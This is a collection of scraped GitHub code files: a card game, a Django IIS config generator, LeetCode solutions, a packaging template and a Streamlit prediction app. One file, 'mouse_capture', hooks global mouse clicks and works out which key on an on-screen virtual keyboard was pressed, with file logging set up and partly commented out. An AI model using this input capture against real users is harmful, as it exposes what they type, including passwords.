\")\nprint(f\"Player 2's hand is {list(map(name, player2))} and their score is {player2score}\")\n\n\nif player1score > player2score:\n print(\"Player 1 won\")\nelif player2score > player1score:\n print(\"Player 2 won\")\nelse:\n print(\"It's a 
draw\")\n","repo_name":"SamBpilot/python-examples","sub_path":"Cards/CardGame.py","file_name":"CardGame.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70222164942","text":"import os\nfrom pathlib import Path\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandParser\nfrom django.template.loader import render_to_string\n\n\nclass Command(BaseCommand):\n help = \"Generate a web.config files for IIS Configuration.\"\n\n def add_arguments(self, parser: CommandParser):\n parser.add_argument(\"--name\", \"-n\", default=\"Django FastCGI\", type=str, help=\"FastCGI Handler Name\")\n parser.add_argument(\"--static\", \"-s\", action=\"store_true\", help=\"Configure IIS to serve static folder\")\n parser.add_argument(\"--media\", \"-m\", action=\"store_true\", help=\"Configure IIS to serve media folder\")\n parser.add_argument(\"--windowsauth\", \"-w\", action=\"store_true\", help=\"Configure IIS for Windows Authentication\")\n parser.add_argument(\"--https\", action=\"store_true\", help=\"Configure IIS to redirect HTTP to HTTPS\")\n parser.add_argument(\"--logs\", \"-l\", default=settings.BASE_DIR / \"logs\", type=str, help=\"Logs folder path\")\n parser.add_argument(\"--override\", \"-f\", action=\"store_true\", help=\"Force override existing files\")\n\n def handle(self, name=None, static=False, media=False,\n windowsauth=False, https=False, logs=None, override=False, **options):\n mode = \"w\" if override else \"x\"\n virtual_dirs = []\n\n # add static virtual directory\n if static:\n virtual_dirs.append({\n \"url\": settings.STATIC_URL,\n \"path\": settings.STATIC_ROOT,\n })\n\n # add media virtual directory\n if media:\n virtual_dirs.append({\n \"url\": settings.MEDIA_URL,\n \"path\": settings.MEDIA_ROOT,\n })\n\n # create root website web.config\n try:\n with open(\"web.config\", mode) as file:\n file.write(render_to_string(\n \"windows_auth/iis_configs/root.config\",\n {\n \"django_settings\": os.environ[\"DJANGO_SETTINGS_MODULE\"],\n \"base_dir\": settings.BASE_DIR,\n \"venv_path\": os.environ[\"VIRTUAL_ENV\"],\n \"handler_name\": name,\n \"wsgi\": settings.WSGI_APPLICATION,\n \"logs_folder\": logs,\n \"windows_auth\": windowsauth,\n \"https\": https,\n })\n )\n print(\"Created web.config file\")\n except FileExistsError:\n print(\"web.config already exist. Use --override / -f to force override of the existing web.config.\")\n\n # create a web.config to allow serving static files for each virtual directory path\n for virtual_dir in virtual_dirs:\n # create folder if does not exist\n if not os.path.exists(virtual_dir[\"path\"]):\n print(virtual_dir['url'] + \" virtual directory source folder does not exist, creating...\")\n os.makedirs(virtual_dir[\"path\"])\n\n try:\n with open(Path(virtual_dir[\"path\"]) / \"web.config\", mode) as file:\n file.write(render_to_string(\n \"windows_auth/iis_configs/serve.config\",\n {\"handler_name\": name})\n )\n print(\"Created web.config file for \" + virtual_dir['url'] + \" virtual directory\")\n except FileExistsError:\n print(virtual_dir['url'] + \" web.config already exist. 
Use --override / -f to force \"\n \"override of the existing web.config.\")\n","repo_name":"danyi1212/django-windowsauth","sub_path":"windows_auth/management/commands/createwebconfig.py","file_name":"createwebconfig.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"47"} +{"seq_id":"75181562703","text":"class Solution(object):\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # dp[i] 当去到第i家时、窃取的最大金额\n if len(nums) == 1:\n return nums[0]\n # 前一家的最大 或者 前两家与这一家的最大\n return max(self.rob_2(nums[1:]), self.rob_2(nums[:-1]))\n\n def rob_2(self, nums):\n if len(nums) == 1:\n return nums[0]\n dp = [0] * (len(nums))\n dp[0] = nums[0]\n dp[1] = max(nums[1], nums[0])\n for i in range(2, len(nums)):\n dp[i] = max(dp[i-1], dp[i-2] + nums[i])\n return dp[-1]","repo_name":"XiaofengYue/LeetCode-Python","sub_path":"动态规划/213.py","file_name":"213.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12258027262","text":"# 二分查找\nclass Solution:\n def binarySearch(self, array, key):\n left = 0\n right = len(array)\n\n while(left < right):\n middle = int((right + left) / 2)\n if array[middle] == key:\n return middle\n elif array[middle] > key:\n right = middle - 1\n else:\n left = middle + 1\n return -1\n\nif __name__ == '__main__':\n print(Solution().binarySearch([1,3,5,6,8,9], 10))","repo_name":"moxi624/LearningNotes","sub_path":"数据结构/NowCode/A1_binarySearch.py","file_name":"A1_binarySearch.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":637,"dataset":"github-code","pt":"47"} +{"seq_id":"72259449743","text":"# Always prefer setuptools over distutils\nimport setuptools\n\n# Get the long description from the README file\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as f:\n long_description = f.read()\n\n__version__ = \"0.0.3\"\n\nREPO_NAME = \"IPYNBrenderer\"\nAUTHOR_USER_NAME = \"MaheshKumarMK\"\nSRC_REPO = \"IPYNBrenderer\"\nAUTHOR_EMAIL = \"maheshmkvb92@gmail.com\"\n\n\nsetuptools.setup(\n # This is the name of your project. The first time you publish this\n # package, this name will be registered for you. It will determine how\n # users can install this project, e.g.:\n #\n # $ pip install sampleproject\n #\n # And where it will live on PyPI: https://pypi.org/project/sampleproject/\n #\n # There are some restrictions on what makes a valid project name\n # specification here:\n # https://packaging.python.org/specifications/core-metadata/#name\n name=SRC_REPO,\n version=__version__,\n # Versions should comply with PEP 440:\n # https://www.python.org/dev/peps/pep-0440/\n #\n # For a discussion on single-sourcing the version across setup.py and the\n # project code, see\n # https://packaging.python.org/guides/single-sourcing-package-version/\n author=AUTHOR_USER_NAME,\n author_email=AUTHOR_EMAIL,\n description=\"A small python package\",\n # This is a one-line description or tagline of what your project does. 
This\n # corresponds to the \"Summary\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#summary\n \n long_description=long_description, \n # This is an optional longer description of your project that represents\n # the body of text which users will see when they visit PyPI.\n #\n # Often, this is the same as your README, so you can just read it in from\n # that file directly (as we have already done above)\n #\n # This field corresponds to the \"Description\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#description-optional\n \n long_description_content=\"text/markdown\", #to render some format\n # Denotes that our long_description is in Markdown; valid values are\n # text/plain, text/x-rst, and text/markdown\n #\n # Optional if long_description is written in reStructuredText (rst) but\n # required for plain-text or Markdown; if unspecified, \"applications should\n # attempt to render [the long_description] as text/x-rst; charset=UTF-8 and\n # fall back to text/plain if it is not valid rst\" (see link below)\n #\n # This field corresponds to the \"Description-Content-Type\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#description-content-type-optional\n \n \n \n url=f\"https://github.com/{AUTHOR_USER_NAME}/{REPO_NAME}\",\n # This should be a valid link to your project's main homepage.\n #\n # This field corresponds to the \"Home-Page\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#home-page-optional\n project_urls={\n \"Bug Tracker\": f\"https://github.com/{AUTHOR_USER_NAME}/{REPO_NAME}/issues\",\n },\n # List additional URLs that are relevant to your project as a dict.\n #\n # This field corresponds to the \"Project-URL\" metadata fields:\n # https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use\n #\n # Examples listed include a pattern for specifying where the package tracks\n # issues, where the source is hosted, where to say thanks to the package\n # maintainers, and where to support the project financially. The key is\n # what's used to render the link text on PyPI.\n # project_urls={ # Optional\n # \"Bug Reports\": \"https://github.com/pypa/sampleproject/issues\",\n # \"Funding\": \"https://donate.pypi.org\",\n # \"Say Thanks!\": \"http://saythanks.io/to/example\",\n # \"Source\": \"https://github.com/pypa/sampleproject/\"\n package_dir={\"\": \"src\"},\n # When your source code is in a subdirectory under the project root, e.g.\n # `src/`, it is necessary to specify the `package_dir` argument.\n packages=setuptools.find_packages(where=\"src\")\n # You can just specify package directories manually here if your project is\n # simple. 
Or you can use find_packages().\n #\n # Alternatively, if you just want to distribute a single Python file, use\n # the `py_modules` argument instead as follows, which will expect a file\n # called `my_module.py` to exist:\n #\n # py_modules=[\"my_module\"],\n \n)","repo_name":"MaheshKumarMK/Python_package_template","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26206554056","text":"# %%writefile app.py%\nimport streamlit as st\nimport pickle\nimport openpyxl\nimport xlrd\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LinearRegression\n\n\n# loading the trained model\nmodel = pickle.load(open('Sportpickle.pkl','rb'))\n\n\ndef main():\n html_temp = \"\"\" \n
<div>\n
    <h1>Okoye-Nobert Sport Prediction Model</h1>\n
    </div>
\n \"\"\"\n\n # display the front end aspect\n st.markdown(html_temp, unsafe_allow_html=True)\n default_value_goes_here = \"\"\n\n uploaded_file = st.file_uploader(\"Choose a XLSX file\", type=\"xlsx\")\n\n global dataframe\n if uploaded_file:\n df = pd.read_excel(uploaded_file)\n dataframe = df\n\n result = \"\"\n\n if st.button(\"Predict\"):\n# arr = dataframe.columns\n\n# for i in arr:\n# notnull = dataframe[i][dataframe[i].notnull()]\n# min = notnull.min()\n# dataframe[i].replace(np.nan, min, inplace=True)\n\n# scaler = StandardScaler()\n# scaler.fit(dataframe)\n# featureshost = scaler.transform(dataframe)\n prediction = model.predict(dataframe)\n\n result = prediction\n st.write(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Nobert-Ok/SportPrediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41271621984","text":"from parsel.csstranslator import XPathExpr, GenericTranslator, HTMLTranslator\nfrom scrapy.utils.deprecate import create_deprecated_class\n\n\nScrapyXPathExpr = create_deprecated_class(\n 'ScrapyXPathExpr', XPathExpr,\n new_class_path='parsel.csstranslator.XPathExpr')\n\nScrapyGenericTranslator = create_deprecated_class(\n 'ScrapyGenericTranslator', GenericTranslator,\n new_class_path='parsel.csstranslator.GenericTranslator')\n\nScrapyHTMLTranslator = create_deprecated_class(\n 'ScrapyHTMLTranslator', HTMLTranslator,\n new_class_path='parsel.csstranslator.HTMLTranslator')\n","repo_name":"dspray95/open-recipe","sub_path":"venv/Lib/site-packages/scrapy/selector/csstranslator.py","file_name":"csstranslator.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"47"} +{"seq_id":"20377552859","text":"from pynput.mouse import Listener\r\nimport logging\r\nfrom win32gui import FindWindow, GetWindowRect, SetWindowPos\r\nfrom win32con import HWND_TOPMOST\r\nfrom win32api import GetSystemMetrics\r\n\r\ncaps = 0\r\n\r\nlogging.basicConfig(filename=\"mouse_log.txt\", level=logging.DEBUG, format=\"%(asctime)s: %(message)s\")\r\n\r\nhwnd = FindWindow(None, \"Free Virtual Keyboard (www.FreeVirtualKeyboard.com)\")\r\n\r\n# Used to find the dimensions of the window\r\nrect = GetWindowRect(hwnd)\r\nrect_x = rect[0]\r\nrect_y = rect[1]\r\nrect_w = rect[2] - rect_x\r\nrect_h = rect[3] - rect_y\r\n\r\n# print(GetSystemMetrics(0), GetSystemMetrics(1))\r\nis1080p = False\r\nif GetSystemMetrics(0) == 1536 and GetSystemMetrics(1) == 864: # if 1080p then...\r\n is1080p = True\r\n\r\nif is1080p:\r\n SetWindowPos(hwnd, HWND_TOPMOST, 384, 648, 768, 216, 0) # may need another inside 'on_click' for consistent size\r\n\r\nelse:\r\n # 1600x900 position_XY(^^^ / 100)* 96 size_XY (^^^ / 83.33 * 100 not exact? 
slight adjustment\r\n SetWindowPos(hwnd, HWND_TOPMOST, 330, 650, 952, 254, 0) # may need another inside 'on_click' for consistent size\r\n\r\n\r\n# change caps value f\r\ndef changer():\r\n global caps # need 'global' keyword to change value of global variable\r\n caps = (caps + 5) % 10\r\n\r\n\r\n# lower case keyboard\r\nlower_list = [[\"Esc\", \"F1\", \"F2\", \"F3\", \"F4\", \"F5\", \"F6\", \"F7\", \"F8\", \"F9\", \"F10\", \"F11\", \"F12\", \"Del\"],\r\n [\"`\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"0\", \"-\", \"=\", \"Backspace\"],\r\n [\"Tab\", \"q\", \"w\", \"e\", \"r\", \"t\", \"y\", \"u\", \"i\", \"o\", \"p\", \"[\", \"]\", \"#\"],\r\n [\"Caps\", \"a\", \"s\", \"d\", \"f\", \"g\", \"h\", \"j\", \"k\", \"l\", \";\", \"'\", \"Enter\"],\r\n [\"Shift\", \"\\ \", \"z\", \"x\", \"c\", \"v\", \"b\", \"n\", \"m\", \",\", \".\", \"/\", \"Shift\"],\r\n [\"Ctrl\", \"Win\", \"Alt\", \"Space\", \"AltGr\", \"Settings\", \"Ctrl\", \"Slider\"]]\r\n\r\n# upper case keyboard\r\nupper_list = [[\"Esc\", \"F1\", \"F2\", \"F3\", \"F4\", \"F5\", \"F6\", \"F7\", \"F8\", \"F9\", \"F10\", \"F11\", \"F12\", \"Del\"],\r\n [\"¬\", \"!\", \"DoubleQuote\", \"£\", \"$\", \"%\", \"^\", \"&\", \"*\", \"(\", \")\", \"_\", \"+\", \"Backspace\"],\r\n [\"Tab\", \"Q\", \"W\", \"E\", \"R\", \"T\", \"Y\", \"U\", \"I\", \"O\", \"P\", \"{\", \"}\", \"~\"],\r\n [\"Caps\", \"A\", \"S\", \"D\", \"F\", \"G\", \"H\", \"J\", \"K\", \"L\", \":\", \"@\", \"Enter\"],\r\n [\"Shift\", \"|\", \"Z\", \"X\", \"C\", \"V\", \"B\", \"N\", \"M\", \"<\", \">\", \"?\", \"Shift\"],\r\n [\"Ctrl\", \"Win\", \"Alt\", \"Space\", \"AltGr\", \"Settings\", \"Ctrl\", \"Slider\"]]\r\n\r\n# keyboard to be used\r\ncase_list = [[]]\r\n\r\n\r\ndef on_click1(x, y, button, pressed):\r\n\r\n if pressed:\r\n\r\n # logging.info(\"Mouse clicked at ===> ({0}, {1})\".format(x, y))\r\n\r\n dynamic_rect = GetWindowRect(hwnd) # this needs to stay dynamic for if window is moved, so inside 'on_click'\r\n x_window = (dynamic_rect[0] + 10) # account for difference between mouse and window xy\r\n y_window = (dynamic_rect[1])\r\n\r\n # if shift/caps is pressed set appropriate keyboard\r\n if caps == 0:\r\n case_list = lower_list\r\n if caps == 5:\r\n case_list = upper_list\r\n\r\n # Coordinate Checker for 1080p\r\n if is1080p: # if 1080p then...\r\n # Converting VK range of XY 1920x1080\r\n x_window = x_window / 80\r\n x_window = x_window * 100\r\n x_window = int(round(x_window))\r\n\r\n y_window = y_window / 80\r\n y_window = y_window * 100\r\n y_window = int(round(y_window))\r\n\r\n y_window = y_window + 40 # accounts for title bar pixels\r\n x_window = x_window - 3 # need this for\r\n\r\n else:\r\n y_window = y_window + 30 # title bar pixels - same calc as ^res^ ((40 / 100) * 83.33)\r\n x_window = x_window - 4\r\n\r\n # needs work around the very edges(1 or 2 pixels off for the sake of having round numbers in the code)\r\n\r\n# Row 0\r\n if y > y_window and y <= y_window + 36: # this range of y values represents the first row in the VK\r\n if x > x_window and x < x_window + 64: # these IF's move along the keys in increments of 64 (width of keys)\r\n print(case_list[0][0])\r\n # logging.info(\"Esc\")\r\n if x > x_window + 64 and x < x_window + 128:\r\n print(case_list[0][1])\r\n # logging.info(\"F1\")\r\n if x > x_window + 128 and x < x_window + 192:\r\n print(case_list[0][2])\r\n # logging.info(\"F2\")\r\n if x > x_window + 192 and x < x_window + 256:\r\n print(case_list[0][3])\r\n # logging.info(\"F3\")\r\n if x > x_window + 256 and x < 
x_window + 320:\r\n print(case_list[0][4])\r\n # logging.info(\"F4\")\r\n if x > x_window + 320 and x < x_window + 384:\r\n print(case_list[0][5])\r\n # logging.info(\"F5\")\r\n if x > x_window + 384 and x < x_window + 448:\r\n print(case_list[0][6])\r\n # logging.info(\"F6\")\r\n if x > x_window + 448 and x < x_window + 512:\r\n print(case_list[0][7])\r\n # logging.info(\"F7\")\r\n if x > x_window + 512 and x < x_window + 576:\r\n print(case_list[0][8])\r\n # logging.info(\"F8\")\r\n if x > x_window + 576 and x < x_window + 640:\r\n print(case_list[0][9])\r\n # logging.info(\"F9\")\r\n if x > x_window + 640 and x < x_window + 704:\r\n print(case_list[0][10])\r\n # logging.info(\"F10\")\r\n if x > x_window + 704 and x < x_window + 768:\r\n print(case_list[0][11])\r\n # logging.info(\"F11\")\r\n if x > x_window + 768 and x < x_window + 832:\r\n print(case_list[0][12])\r\n # logging.info(\"F12\")\r\n if x > x_window + 832 and x < x_window + 9401:\r\n print(case_list[0][13])\r\n # logging.info(\"Del\")\r\n\r\n\r\n# Row 1\r\n if y > y_window + 36 and y <= y_window + 72: # range moves up by 36 for next row\r\n if x > x_window and x <= x_window + 64: # these IF's move along the keys in increments of 64(width of keys)\r\n print(case_list[1][0])\r\n # logging.info(\"'\")\r\n if x > x_window + 64 and x <= x_window + 128:\r\n print(case_list[1][1])\r\n # logging.info(\"1\")\r\n if x > x_window + 128 and x <= x_window + 192:\r\n print(case_list[1][2])\r\n # logging.info(\"2\")\r\n if x > x_window + 192 and x <= x_window + 256:\r\n print(case_list[1][3])\r\n # logging.info(\"3\")\r\n if x > x_window + 256 and x <= x_window + 320:\r\n print(case_list[1][4])\r\n # logging.info(\"4\")\r\n if x > x_window + 320 and x <= x_window + 384:\r\n print(case_list[1][5])\r\n # logging.info(\"5\")\r\n if x > x_window + 384 and x <= x_window + 448:\r\n print(case_list[1][6])\r\n # logging.info(\"6\")\r\n if x > x_window + 448 and x <= x_window + 512:\r\n print(case_list[1][7])\r\n # logging.info(\"7\")\r\n if x > x_window + 512 and x <= x_window + 576:\r\n print(case_list[1][8])\r\n # logging.info(\"8\")\r\n if x > x_window + 576 and x <= x_window + 640:\r\n print(case_list[1][9])\r\n # logging.info(\"9\")\r\n if x > x_window + 640 and x <= x_window + 704:\r\n print(case_list[1][10])\r\n # logging.info(\"0\")\r\n if x > x_window + 704 and x <= x_window + 768:\r\n print(case_list[1][11])\r\n # logging.info(\"-\")\r\n if x > x_window + 768 and x <= x_window + 832:\r\n print(case_list[1][12])\r\n # logging.info(\"=\")\r\n if x > x_window + 832 and x <= x_window + 940: # not sure why this isn't 960 (diagram)\r\n print(case_list[1][13])\r\n # logging.info(\"Backspace\")\r\n\r\n\r\n# Row 2\r\n if y > y_window + 72 and y <= y_window + 108: # range moves up by 55 for next row\r\n if x > x_window and x < x_window + 108: # these IFs move along the keys in increments of 75 (width of keys)\r\n print(case_list[2][0])\r\n # logging.info(\"Tab\")\r\n if x > x_window + 108 and x < x_window + 172:\r\n print(case_list[2][1])\r\n # logging.info(\"q\")\r\n if x > x_window + 172 and x < x_window + 236:\r\n print(case_list[2][2])\r\n # logging.info(\"w\")\r\n if x > x_window + 236 and x < x_window + 300:\r\n print(case_list[2][3])\r\n # logging.info(\"e\")\r\n if x > x_window + 300 and x < x_window + 364:\r\n print(case_list[2][4])\r\n # logging.info(\"r\")\r\n if x > x_window + 364 and x < x_window + 428:\r\n print(case_list[2][5])\r\n # logging.info(\"t\")\r\n if x > x_window + 428 and x < x_window + 492:\r\n print(case_list[2][6])\r\n 
# logging.info(\"y\")\r\n if x > x_window + 492 and x < x_window + 556:\r\n print(case_list[2][7])\r\n # logging.info(\"u\")\r\n if x > x_window + 556 and x < x_window + 620:\r\n print(case_list[2][8])\r\n # logging.info(\"i\")\r\n if x > x_window + 620 and x < x_window + 684:\r\n print(case_list[2][9])\r\n # logging.info(\"o\")\r\n if x > x_window + 684 and x < x_window + 748:\r\n print(case_list[2][10])\r\n # logging.info(\"p\")\r\n if x > x_window + 748 and x < x_window + 812:\r\n print(case_list[2][11])\r\n # logging.info(\"[\")\r\n if x > x_window + 812 and x < x_window + 876:\r\n print(case_list[2][12])\r\n # logging.info(\"]\")\r\n if x > x_window + 876 and x < x_window + 940:\r\n print(case_list[2][13])\r\n # logging.info(\"#\")\r\n\r\n\r\n# Row 3\r\n if y > y_window + 108 and y <= y_window + 144: # range moves up by 55 for next row\r\n if x > x_window and x < x_window + 128: # these IF's move along the keys in increments of 75 (width of keys\r\n # print(case_list[3][0])\r\n # logging.info(\"Caps\")\r\n changer() # calls function to alternate caps value between 0 and 5(upper/lower)\r\n\r\n if x > x_window + 128 and x < x_window + 192:\r\n print(case_list[3][1])\r\n # logging.info(\"a\")\r\n if x > x_window + 192 and x < x_window + 256:\r\n print(case_list[3][2])\r\n # logging.info(\"s\")\r\n if x > x_window + 256 and x < x_window + 320:\r\n print(case_list[3][3])\r\n # logging.info(\"d\")\r\n if x > x_window + 320 and x < x_window + 384:\r\n print(case_list[3][4])\r\n # logging.info(\"f\")\r\n if x > x_window + 384 and x < x_window + 448:\r\n print(case_list[3][5])\r\n # logging.info(\"g\")\r\n if x > x_window + 448 and x < x_window + 512:\r\n print(case_list[3][6])\r\n # logging.info(\"h\")\r\n if x > x_window + 512 and x < x_window + 576:\r\n print(case_list[3][7])\r\n # logging.info(\"j\")\r\n if x > x_window + 576 and x < x_window + 640:\r\n print(case_list[3][8])\r\n # logging.info(\"k\")\r\n if x > x_window + 640 and x < x_window + 704:\r\n print(case_list[3][9])\r\n # logging.info(\"l\")\r\n if x > x_window + 704 and x < x_window + 768:\r\n print(case_list[3][10])\r\n # logging.info(\";\")\r\n if x > x_window + 768 and x < x_window + 832:\r\n print(case_list[3][11])\r\n # logging.info(\"'\")\r\n if x > x_window + 832 and x < x_window + 940:\r\n # key_enter = True # may need something like this for post log handling\r\n print(case_list[3][12])\r\n # logging.info(\"Enter\")\r\n\r\n\r\n# Row 4\r\n if y > y_window + 144 and y <= y_window + 180: # range moves up by 55 for next row\r\n if x > x_window and x < x_window + 108: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[4][0])\r\n # logging.info(\"Shift\")\r\n if x > x_window + 108 and x < x_window + 172:\r\n print(case_list[4][1])\r\n # logging.info(\" \\ \")\r\n if x > x_window + 172 and x < x_window + 236:\r\n print(case_list[4][2])\r\n # logging.info(\"z\")\r\n if x > x_window + 236 and x < x_window + 300:\r\n print(case_list[4][3])\r\n # logging.info(\"x\")\r\n if x > x_window + 300 and x < x_window + 364:\r\n print(case_list[4][4])\r\n # logging.info(\"c\")\r\n if x > x_window + 364 and x < x_window + 428:\r\n print(case_list[4][5])\r\n # logging.info(\"v\")\r\n if x > x_window + 428 and x < x_window + 492:\r\n print(case_list[4][6])\r\n # logging.info(\"b\")\r\n if x > x_window + 492 and x < x_window + 556:\r\n print(case_list[4][7])\r\n # logging.info(\"n\")\r\n if x > x_window + 556 and x < x_window + 620:\r\n print(case_list[4][8])\r\n # logging.info(\"m\")\r\n if x > x_window + 
620 and x < x_window + 684:\r\n print(case_list[4][9])\r\n # logging.info(\",\")\r\n if x > x_window + 684 and x < x_window + 748:\r\n print(case_list[4][10])\r\n # logging.info(\".\")\r\n if x > x_window + 748 and x < x_window + 812:\r\n print(case_list[4][11])\r\n # logging.info(\"/\")\r\n if x > x_window + 812 and x < x_window + 940:\r\n print(case_list[4][12])\r\n # logging.info(\"Shift\")\r\n\r\n\r\n# Row 5\r\n if y > y_window + 180 and y <= y_window + 216: # range moves up by 55 for next row\r\n if x > x_window and x < x_window + 86: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][0])\r\n # logging.info(\"Ctrl\")\r\n if x > x_window + 86 and x < x_window + 150:\r\n print(case_list[5][1])\r\n # logging.info(\"Win\")\r\n if x > x_window + 150 and x < x_window + 214:\r\n print(case_list[5][2])\r\n # logging.info(\"Alt\")\r\n if x > x_window + 214 and x < x_window + 588: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][3])\r\n # logging.info(\"Space\")\r\n if x > x_window + 588 and x < x_window + 673: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][4])\r\n # logging.info(\"AltGr\")\r\n if x > x_window + 673 and x < x_window + 748: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][5])\r\n # logging.info(\"Settings\")\r\n if x > x_window + 748 and x < x_window + 812: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][6])\r\n # logging.info(\"Ctrl\")\r\n if x > x_window + 812 and x < x_window + 940: # these IF's move along the keys in increments of 75 (width of keys\r\n print(case_list[5][7])\r\n # logging.info(\"Transparency Slider\")\r\n\r\n#\r\n# run continuously?\r\nwith Listener(on_click=on_click1) as listener:\r\n listener.join()\r\n\r\n","repo_name":"CillianTobin/B00099032","sub_path":"mouse_capture(21-04-2019).py","file_name":"mouse_capture(21-04-2019).py","file_ext":"py","file_size_in_byte":15968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36247024938","text":"from pprint import pprint\n\nfrom django.core.cache import cache\n\nfrom utils.cache import timeout\nfrom utils.functions import my_make_key_cache, fo2logger\n\nimport produto.queries\n\n\nclass CustoItem:\n def __init__(self, cursor, nivel, ref, tam, cor, alt, consumo=1):\n self.data = []\n self.cursor = cursor\n self.nivel = nivel\n self.ref = ref\n self.tam = tam\n self.cor = cor\n self.alt = alt\n self.consumo = consumo\n\n def componentes_e_custo(\n self, cursor, estrut_nivel, nivel, ref, tam, cor, alt,\n consumo, consumo_pai):\n if estrut_nivel == 0:\n narrativa = produto.queries.item_narrativa(\n cursor, nivel, ref, tam, cor)\n if not narrativa:\n return []\n componentes = [{\n 'ESTRUT_NIVEL': 0, 'SEQ': '',\n 'NIVEL': nivel, 'REF': ref, 'TAM': tam, 'COR': cor,\n 'DESCR': narrativa[0]['NARRATIVA'],\n 'ALT': alt, 'CONSUMO': consumo, 'PRECO': '', 'CUSTO': '',\n 'TCALC': 0, 'RBANHO': 0, 'TEMALT': 0,\n }]\n else:\n componentes = produto.queries.item_comps_custo(\n cursor, nivel, ref, tam, cor, alt)\n\n total_custo = 0\n if componentes and self.data:\n self.data[-1]['TEMALT'] = 1\n for comp in componentes:\n if comp['CONSUMO'] is None:\n comp['CONSUMO'] = 0\n self.data.append(comp)\n comp['TEMALT'] = 0\n comp['ESTRUT_NIVEL'] = estrut_nivel\n if comp['NIVEL'] != 9:\n sub_custo = self.componentes_e_custo(\n cursor, estrut_nivel+1,\n comp['NIVEL'], 
comp['REF'],\n comp['TAM'], comp['COR'], comp['ALT'],\n comp['CONSUMO'], consumo)\n if sub_custo > 0:\n comp['PRECO'] = sub_custo\n if comp['TCALC'] == 2: # g/l\n comp['CONSUMO'] *= comp['RBANHO']\n comp['CUSTO'] = comp['CONSUMO'] * comp['PRECO']\n total_custo += 0 if isinstance(\n comp['CUSTO'], str) else comp['CUSTO']\n return total_custo\n\n def get_data(self):\n # key_cache = make_key_cache(\n # obey=[\n # self.nivel,\n # self.ref,\n # self.tam,\n # self.cor,\n # self.alt,\n # self.consumo,\n # ]\n # )\n key_cache = my_make_key_cache(\n 'CustoItem', self.nivel, self.ref, self.tam, self.cor, self.alt,\n self.consumo)\n cached_result = cache.get(key_cache)\n if cached_result is not None:\n fo2logger.info('cached '+key_cache)\n return cached_result\n\n self.componentes_e_custo(\n self.cursor, 0,\n self.nivel, self.ref, self.tam, self.cor, self.alt,\n self.consumo, 1)\n result = self.data\n\n cache.set(key_cache, result, timeout=timeout.MINUTES_5)\n fo2logger.info('calculated '+key_cache)\n return result\n","repo_name":"anselmobd/fo2","sub_path":"src/produto/queries/custo_item.py","file_name":"custo_item.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13735668330","text":"import sys\nsys.setrecursionlimit(10**7)\ninput = sys.stdin.readline\n\nn = int(input())\np = []\nfor i in range(n):\n x = int(input())\n p.append(x)\n\nma = max(p)\ns = sum(p)\n\nprint(s - ma + ma // 2)\n","repo_name":"urawa72/procon","sub_path":"atcorder/abc115/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14862431316","text":"import turtle\nimport math\nimport time\nturtle.shape('turtle')\nl = 11\na=50\ndef star(n):\n for i in range(1, n+1, 1):\n turtle.left(180-(180/n))\n turtle.forward(a)\n time.sleep(20)\nstar(l)\n\n","repo_name":"evgeniy-mirohin/Python_","sub_path":"звезды.py","file_name":"звезды.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6927945510","text":"valores = []\nr = \"s\"\nwhile r != \"N\":\n valores.append(int(input(\"Digite um valor \")))\n r = input(\"Gostaria de continuar? 
